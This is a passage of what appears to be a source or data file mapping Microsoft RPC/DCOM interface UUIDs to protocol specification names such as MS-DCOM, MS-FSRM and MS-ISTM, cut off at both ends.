Host COM',\n'C8550BFF-5281-4B1E-AC34-99B6FA38464D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'08A90F5F-0702-48D6-B45F-02A9885A9768':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'8F6D760F-F0CB-4D69-B5F6-848B33E9BDC6':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'E7927575-5CC3-403B-822E-328A6B904BEE':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'DE095DB1-5368-4D11-81F6-EFEF619B7BCF':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'64FF8CCC-B287-4DAE-B08A-A72CBF45F453':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'EAFE4895-A929-41EA-B14D-613E23F62B71':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'EF13D885-642C-4709-99EC-B89561C6BC69':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'0191775E-BCFF-445A-B4F4-3BDDA54E2816':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'31A83EA0-C0E4-4A2C-8A01-353CC2A4C60A':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'D6C7CD8F-BB8D-4F96-B591-D3A5F1320269':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'ADA4E6FB-E025-401E-A5D0-C3134A281F07':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'B7D381EE-8860-47A1-8AF4-1F33B2B1F325':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'C5C04795-321C-4014-8FD6-D44658799393':'[MC-IISA]: Internet Information Services (IIS) Application Host COM',\n'EBA96B22-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'12A30900-7300-11D2-B0E6-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B24-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'2CE0C5B0-6E67-11D2-B0E6-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B0E-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'B196B285-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',\n'39CE96FE-F4C5-4484-A143-4C2D5D324229':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E07F-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B1A-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B18-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B23-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B14-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'FD174A80-89CF-11D2-B0F2-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'F72B9031-2F0C-43E8-924E-E6052CDC493F':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E072-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E075-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'0188401C-247A-4FED-99C6-BF14119D7055':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B15-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E07C-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'BE5F0241-E489-4957-8CC4-A452FCF3E23E':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B1C-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E077-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E078-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'B196B284-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E073-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E07D-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B1B-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E079-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E084-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B1F-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'33B6D07E-F27D-42FA-B2D7-BF82E11E9374':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E07A-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'0188AC2F-ECB3-4173-9779-635CA2039C72':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E085-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EF0574E0-06D8-11D3-B100-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E086-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'B196B286-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D9933BE0-A567-11D2-B0F3-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7AB3341-C9D3-11D1-BB47-0080C7C5A2C0':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E082-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'0FB15084-AF41-11CE-BD2B-204C4F4F5020':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E083-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B13-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B1D-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B17-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B20-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E074-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'7FBE7759-5760-444D-B8A5-5E7AB9A84CCE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'B196B287-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B12-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B1E-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E07E-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E081-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E07B-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'64C478FB-F9B0-4695-8A7F-439AC94326D3':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B16-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B19-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B10-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B21-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E076-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B0F-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'EBA96B11-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):',\n'D7D6E080-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):',\n'4639DB2A-BFC5-11D2-9318-00C04FBBBFB3':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol',\n'0EAC4842-8763-11CF-A743-00AA00A3F00D':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol',\n'070669EB-B52F-11D1-9270-00C04FBBBFB3':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol',\n'3DDE7C30-165D-11D1-AB8F-00805F14DB40':'[MS-BKRP]: BackupKey Remote Protocol',\n'E3D0D746-D2AF-40FD-8A7A-0D7078BB7092':'[MS-BPAU]: Background Intelligent Transfer Service (BITS) Peer-',\n'6BFFD098-A112-3610-9833-012892020162':'[MS-BRWSA]: Common Internet File System (CIFS) Browser Auxiliary',\n'AFC07E2E-311C-4435-808C-C483FFEEC7C9':'[MS-CAPR]: Central Access Policy Identifier (ID) Retrieval Protocol',\n'B97DB8B2-4C63-11CF-BFF6-08002BE23F2F':'[MS-CMRP]: Failover Cluster:',\n'97199110-DB2E-11D1-A251-0000F805CA53':'[MS-COM]: Component Object Model Plus (COM+) Protocol',\n'0E3D6630-B46B-11D1-9D2D-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'3F3B1B86-DBBE-11D1-9DA6-00805F85CFE3':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'7F43B400-1A0E-4D57-BBC9-6B0C65F7A889':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'456129E2-1078-11D2-B0F9-00805FC73204':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'8DB2180E-BD29-11D1-8B7E-00C04FD7A924':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'182C40FA-32E4-11D0-818B-00A0C9231C29':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'971668DC-C3FE-4EA1-9643-0C7230F494A1':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'98315903-7BE5-11D2-ADC1-00A02463D6E7':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'6C935649-30A6-4211-8687-C4C83E5FE1C7':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'F131EA3E-B7BE-480E-A60D-51CB2785779E':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'1F7B1697-ECB2-4CBB-8A0E-75C427F4A6F0':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'A8927A41-D3CE-11D1-8472-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'CFADAC84-E12C-11D1-B34C-00C04F990D54':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'1D118904-94B3-4A64-9FA6-ED432666A7B9':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'47CDE9A1-0BF6-11D2-8016-00C04FB9988E':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'0E3D6631-B46B-11D1-9D2D-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'C2BE6970-DF9E-11D1-8B87-00C04FD7A924':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'C726744E-5735-4F08-8286-C510EE638FB6':'[MS-COMA]: Component Object Model Plus (COM+) Remote',\n'FBC1D17D-C498-43A0-81AF-423DDD530AF6':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'F89AC270-D4EB-11D1-B682-00805FC79216':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'FB2B72A1-7A68-11D1-88F9-0080C7D771BF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'4E14FB9F-2E22-11D1-9964-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'A0E8F27A-888C-11D1-B763-00C04FB926AF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'7FB7EA43-2D76-4EA8-8CD9-3DECC270295E':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'99CC098F-A48A-4E9C-8E58-965C0AFC19D5':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'FB2B72A0-7A68-11D1-88F9-0080C7D771BF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'4A6B0E16-2E38-11D1-9965-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'F4A07D63-2E25-11D1-9964-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'4A6B0E15-2E38-11D1-9965-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System',\n'B60040E0-BCF3-11D1-861D-0080C729264D':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service',\n'23C9DD26-2355-4FE2-84DE-F779A238ADBD':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service',\n'4E6CDCC9-FB25-4FD5-9CC5-C9F4B6559CEC':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service',\n'D99E6E71-FC88-11D0-B498-00A0C90312F3':'[MS-CSRA]: Certificate Services Remote Administration Protocol',\n'7FE0D935-DDA6-443F-85D0-1CFB58FE41DD':'[MS-CSRA]: Certificate Services Remote Administration Protocol',\n'E1568352-586D-43E4-933F-8E6DC4DE317A':'[MS-CSVP]: Failover Cluster:',\n'11942D87-A1DE-4E7F-83FB-A840D9C5928D':'[MS-CSVP]: Failover Cluster:',\n'491260B5-05C9-40D9-B7F2-1F7BDAE0927F':'[MS-CSVP]: Failover Cluster:',\n'C72B09DB-4D53-4F41-8DCC-2D752AB56F7C':'[MS-CSVP]: Failover Cluster:',\n'E3C9B851-C442-432B-8FC6-A7FAAFC09D3B':'[MS-CSVP]: Failover Cluster:',\n'4142DD5D-3472-4370-8641-DE7856431FB0':'[MS-CSVP]: Failover Cluster:',\n'D6105110-8917-41A5-AA32-8E0AA2933DC9':'[MS-CSVP]: Failover Cluster:',\n'A6D3E32B-9814-4409-8DE3-CFA673E6D3DE':'[MS-CSVP]: Failover Cluster:',\n'04D55210-B6AC-4248-9E69-2A569D1D2AB6':'[MS-CSVP]: Failover Cluster:',\n'2931C32C-F731-4C56-9FEB-3D5F1C5E72BF':'[MS-CSVP]: Failover Cluster:',\n'12108A88-6858-4467-B92F-E6CF4568DFB6':'[MS-CSVP]: Failover Cluster:',\n'85923CA7-1B6B-4E83-A2E4-F5BA3BFBB8A3':'[MS-CSVP]: Failover Cluster:',\n'F1D6C29C-8FBE-4691-8724-F6D8DEAEAFC8':'[MS-CSVP]: Failover Cluster:',\n'3CFEE98C-FB4B-44C6-BD98-A1DB14ABCA3F':'[MS-CSVP]: Failover Cluster:',\n'88E7AC6D-C561-4F03-9A60-39DD768F867D':'[MS-CSVP]: Failover Cluster:',\n'00000131-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',\n'4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',\n'00000143-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',\n'000001A0-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',\n'99FCFEC4-5260-101B-BBCB-00AA0021347A':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',\n'00000000-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote',\n'4FC742E0-4A10-11CF-8273-00AA004AE673':'[MS-DFSNM]: Distributed File System (DFS):',\n'9009D654-250B-4E0D-9AB0-ACB63134F69F':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'E65E8028-83E8-491B-9AF7-AAF6BD51A0CE':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'D3766938-9FB7-4392-AF2F-2CE8749DBBD0':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'4BB8AB1D-9EF9-4100-8EB6-DD4B4E418B72':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'CEB5D7B4-3964-4F71-AC17-4BF57A379D87':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'7A2323C7-9EBE-494A-A33C-3CC329A18E1D':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'20D15747-6C48-4254-A358-65039FD8C63C':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'C4B0C7D9-ABE0-4733-A1E1-9FDEDF260C7A':'[MS-DFSRH]: DFS Replication Helper Protocol',\n'6BFFD098-A112-3610-9833-46C3F874532D':'[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)',\n'5B821720-F63B-11D0-AAD2-00C04FC324DB':'[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)',\n'4DA1C422-943D-11D1-ACAE-00C04FC2AA3F':'[MS-DLTM]: Distributed Link Tracking:',\n'300F3532-38CC-11D0-A3F0-0020AF6B0ADD':'[MS-DLTW]: Distributed Link Tracking:',\n'D2D79DF5-3400-11D0-B40B-00AA005FF586':'[MS-DMRP]: Disk Management Remote Protocol',\n'DEB01010-3A37-4D26-99DF-E2BB6AE3AC61':'[MS-DMRP]: Disk Management Remote Protocol',\n'3A410F21-553F-11D1-8E5E-00A0C92C9D5D':'[MS-DMRP]: Disk Management Remote Protocol',\n'D2D79DF7-3400-11D0-B40B-00AA005FF586':'[MS-DMRP]: Disk Management Remote Protocol',\n'4BDAFC52-FE6A-11D2-93F8-00105A11164A':'[MS-DMRP]: Disk Management Remote Protocol',\n'135698D2-3A37-4D26-99DF-E2BB6AE3AC61':'[MS-DMRP]: Disk Management Remote Protocol',\n'50ABC2A4-574D-40B3-9D66-EE4FD5FBA076':'[MS-DNSP]: Domain Name Service (DNS) Server Management',\n'7C44D7D4-31D5-424C-BD5E-2B3E1F323D22':'[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol',\n'3919286A-B10C-11D0-9BA8-00C04FD92EF5':'[MS-DSSP]: Directory Services Setup Remote Protocol',\n'14A8831C-BC82-11D2-8A64-0008C7457E5D':'[MS-EERR]: ExtendedError Remote Data Structure',\n'C681D488-D850-11D0-8C52-00C04FD90F7E':'[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol',\n'82273FDC-E32A-18C3-3F78-827929DC23EA':'[MS-EVEN]: EventLog Remoting Protocol',\n'6B5BDD1E-528C-422C-AF8C-A4079BE4FE48':'[MS-FASP]: Firewall and Advanced Security Protocol',\n'6099FC12-3EFF-11D0-ABD0-00C04FD91A4E':'[MS-FAX]: Fax Server and Client Remote Protocol',\n'EA0A3165-4834-11D2-A6F8-00C04FA346CC':'[MS-FAX]: Fax Server and Client Remote Protocol',\n'897E2E5F-93F3-4376-9C9C-FD2277495C27':'[MS-FRS2]: Distributed File System Replication Protocol',\n'377F739D-9647-4B8E-97D2-5FFCE6D759CD':'[MS-FSRM]: File Server Resource Manager Protocol',\n'F411D4FD-14BE-4260-8C40-03B7C95E608A':'[MS-FSRM]: File Server Resource Manager Protocol',\n'4C8F96C3-5D94-4F37-A4F4-F56AB463546F':'[MS-FSRM]: File Server Resource Manager Protocol',\n'CFE36CBA-1949-4E74-A14F-F1D580CEAF13':'[MS-FSRM]: File Server Resource Manager Protocol',\n'8276702F-2532-4839-89BF-4872609A2EA4':'[MS-FSRM]: File Server Resource Manager Protocol',\n'4A73FEE4-4102-4FCC-9FFB-38614F9EE768':'[MS-FSRM]: File Server Resource Manager Protocol',\n'F3637E80-5B22-4A2B-A637-BBB642B41CFC':'[MS-FSRM]: File Server Resource Manager Protocol',\n'1568A795-3924-4118-B74B-68D8F0FA5DAF':'[MS-FSRM]: File Server Resource Manager Protocol',\n'6F4DBFFF-6920-4821-A6C3-B7E94C1FD60C':'[MS-FSRM]: File Server Resource Manager Protocol',\n'39322A2D-38EE-4D0D-8095-421A80849A82':'[MS-FSRM]: File Server Resource Manager Protocol',\n'326AF66F-2AC0-4F68-BF8C-4759F054FA29':'[MS-FSRM]: File Server Resource Manager Protocol',\n'27B899FE-6FFA-4481-A184-D3DAADE8A02B':'[MS-FSRM]: File Server Resource Manager Protocol',\n'E1010359-3E5D-4ECD-9FE4-EF48622FDF30':'[MS-FSRM]: File Server Resource Manager Protocol',\n'8DD04909-0E34-4D55-AFAA-89E1F1A1BBB9':'[MS-FSRM]: File Server Resource Manager Protocol',\n'96DEB3B5-8B91-4A2A-9D93-80A35D8AA847':'[MS-FSRM]: File Server Resource Manager Protocol',\n'D8CC81D9-46B8-4FA4-BFA5-4AA9DEC9B638':'[MS-FSRM]: File Server Resource Manager Protocol',\n'EDE0150F-E9A3-419C-877C-01FE5D24C5D3':'[MS-FSRM]: File Server Resource Manager Protocol',\n'15A81350-497D-4ABA-80E9-D4DBCC5521FE':'[MS-FSRM]: File Server Resource Manager Protocol',\n'12937789-E247-4917-9C20-F3EE9C7EE783':'[MS-FSRM]: File Server Resource Manager Protocol',\n'F76FBF3B-8DDD-4B42-B05A-CB1C3FF1FEE8':'[MS-FSRM]: File Server Resource Manager Protocol',\n'CB0DF960-16F5-4495-9079-3F9360D831DF':'[MS-FSRM]: File Server Resource Manager Protocol',\n'4846CB01-D430-494F-ABB4-B1054999FB09':'[MS-FSRM]: File Server Resource Manager Protocol',\n'6CD6408A-AE60-463B-9EF1-E117534D69DC':'[MS-FSRM]: File Server Resource Manager Protocol',\n'EE321ECB-D95E-48E9-907C-C7685A013235':'[MS-FSRM]: File Server Resource Manager Protocol',\n'38E87280-715C-4C7D-A280-EA1651A19FEF':'[MS-FSRM]: File Server Resource Manager Protocol',\n'BEE7CE02-DF77-4515-9389-78F01C5AFC1A':'[MS-FSRM]: File Server Resource Manager Protocol',\n'9A2BF113-A329-44CC-809A-5C00FCE8DA40':'[MS-FSRM]: File Server Resource Manager Protocol',\n'4173AC41-172D-4D52-963C-FDC7E415F717':'[MS-FSRM]: File Server Resource Manager Protocol',\n'AD55F10B-5F11-4BE7-94EF-D9EE2E470DED':'[MS-FSRM]: File Server Resource Manager Protocol',\n'BB36EA26-6318-4B8C-8592-F72DD602E7A5':'[MS-FSRM]: File Server Resource Manager Protocol',\n'FF4FA04E-5A94-4BDA-A3A0-D5B4D3C52EBA':'[MS-FSRM]: File Server Resource Manager Protocol',\n'22BCEF93-4A3F-4183-89F9-2F8B8A628AEE':'[MS-FSRM]: File Server Resource Manager Protocol',\n'6879CAF9-6617-4484-8719-71C3D8645F94':'[MS-FSRM]: File Server Resource Manager Protocol',\n'5F6325D3-CE88-4733-84C1-2D6AEFC5EA07':'[MS-FSRM]: File Server Resource Manager Protocol',\n'8BB68C7D-19D8-4FFB-809E-BE4FC1734014':'[MS-FSRM]: File Server Resource Manager Protocol',\n'A2EFAB31-295E-46BB-B976-E86D58B52E8B':'[MS-FSRM]: File Server Resource Manager Protocol',\n'0770687E-9F36-4D6F-8778-599D188461C9':'[MS-FSRM]: File Server Resource Manager Protocol',\n'AFC052C2-5315-45AB-841B-C6DB0E120148':'[MS-FSRM]: File Server Resource Manager Protocol',\n'515C1277-2C81-440E-8FCF-367921ED4F59':'[MS-FSRM]: File Server Resource Manager Protocol',\n'D2DC89DA-EE91-48A0-85D8-CC72A56F7D04':'[MS-FSRM]: File Server Resource Manager Protocol',\n'47782152-D16C-4229-B4E1-0DDFE308B9F6':'[MS-FSRM]: File Server Resource Manager Protocol',\n'205BEBF8-DD93-452A-95A6-32B566B35828':'[MS-FSRM]: File Server Resource Manager Protocol',\n'1BB617B8-3886-49DC-AF82-A6C90FA35DDA':'[MS-FSRM]: File Server Resource Manager Protocol',\n'42DC3511-61D5-48AE-B6DC-59FC00C0A8D6':'[MS-FSRM]: File Server Resource Manager Protocol',\n'426677D5-018C-485C-8A51-20B86D00BDC4':'[MS-FSRM]: File Server Resource Manager Protocol',\n'E946D148-BD67-4178-8E22-1C44925ED710':'[MS-FSRM]: File Server Resource Manager Protocol',\n'D646567D-26AE-4CAA-9F84-4E0AAD207FCA':'[MS-FSRM]: File Server Resource Manager Protocol',\n'F82E5729-6ABA-4740-BFC7-C7F58F75FB7B':'[MS-FSRM]: File Server Resource Manager Protocol',\n'2DBE63C4-B340-48A0-A5B0-158E07FC567E':'[MS-FSRM]: File Server Resource Manager Protocol',\n'A8E0653C-2744-4389-A61D-7373DF8B2292':'[MS-FSRVP]: File Server Remote VSS Protocol',\n'B9785960-524F-11DF-8B6D-83DCDED72085':'[MS-GKDI]: Group Key Distribution Protocol',\n'91AE6020-9E3C-11CF-8D7C-00AA00C091BE':'[MS-ICPR]: ICertPassage Remote Protocol',\n'E8FB8620-588F-11D2-9D61-00C04F79C5FE':'[MS-IISS]: Internet Information Services (IIS) ServiceControl',\n'F612954D-3B0B-4C56-9563-227B7BE624B4':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',\n'8298D101-F992-43B7-8ECA-5052D885B995':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',\n'29822AB8-F302-11D0-9953-00C04FD919C1':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',\n'70B51430-B6CA-11D0-B9B9-00A0C922E750':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',\n'29822AB7-F302-11D0-9953-00C04FD919C1':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',\n'BD0C73BC-805B-4043-9C30-9A28D64DD7D2':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',\n'7C4E1804-E342-483D-A43E-A850CFCC8D18':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',\n'6619A740-8154-43BE-A186-0319578E02DB':'[MS-IOI]: IManagedObject Interface Protocol',\n'8165B19E-8D3A-4D0B-80C8-97DE310DB583':'[MS-IOI]: IManagedObject Interface Protocol',\n'C3FCC19E-A970-11D2-8B5A-00A0C9B7C9C4':'[MS-IOI]: IManagedObject Interface Protocol',\n'82AD4280-036B-11CF-972C-00AA006887B0':'[MS-IRP]: Internet Information Services (IIS) Inetinfo Remote',\n'4E65A71E-4EDE-4886-BE67-3C90A08D1F29':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'866A78BC-A2FB-4AC4-94D5-DB3041B4ED75':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'B0D1AC4B-F87A-49B2-938F-D439248575B2':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'E141FD54-B79E-4938-A6BB-D523C3D49FF1':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'40CC8569-6D23-4005-9958-E37F08AE192B':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'1822A95E-1C2B-4D02-AB25-CC116DD9DBDE':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'B4FA8E86-2517-4A88-BD67-75447219EEE4':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'3C73848A-A679-40C5-B101-C963E67F9949':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'66C9B082-7794-4948-839A-D8A5A616378F':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'01454B97-C6A5-4685-BEA8-9779C88AB990':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'D6BD6D63-E8CB-4905-AB34-8A278C93197A':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'348A0821-69BB-4889-A101-6A9BDE6FA720':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'703E6B03-7AD1-4DED-BA0D-E90496EBC5DE':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'100DA538-3F4A-45AB-B852-709148152789':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'592381E5-8D3C-42E9-B7DE-4E77A1F75AE4':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'883343F1-CEED-4E3A-8C1B-F0DADFCE281E':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'6AEA6B26-0680-411D-8877-A148DF3087D5':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'D71B2CAE-33E8-4567-AE96-3CCF31620BE2':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'8C58F6B3-4736-432A-891D-389DE3505C7C':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'1995785D-2A1E-492F-8923-E621EACA39D9':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'C10A76D8-1FE4-4C2F-B70D-665265215259':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'8D7AE740-B9C5-49FC-A11E-89171907CB86':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'8AD608A4-6C16-4405-8879-B27910A68995':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'B0076FEC-A921-4034-A8BA-090BC6D03BDE':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'640038F1-D626-40D8-B52B-09660601D045':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'BB39E296-AD26-42C5-9890-5325333BB11E':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'B06A64E3-814E-4FF9-AFAC-597AD32517C7':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'A5ECFC73-0013-4A9E-951C-59BF9735FDDA':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'1396DE6F-A794-4B11-B93F-6B69A5B47BAE':'[MS-ISTM]: iSCSI 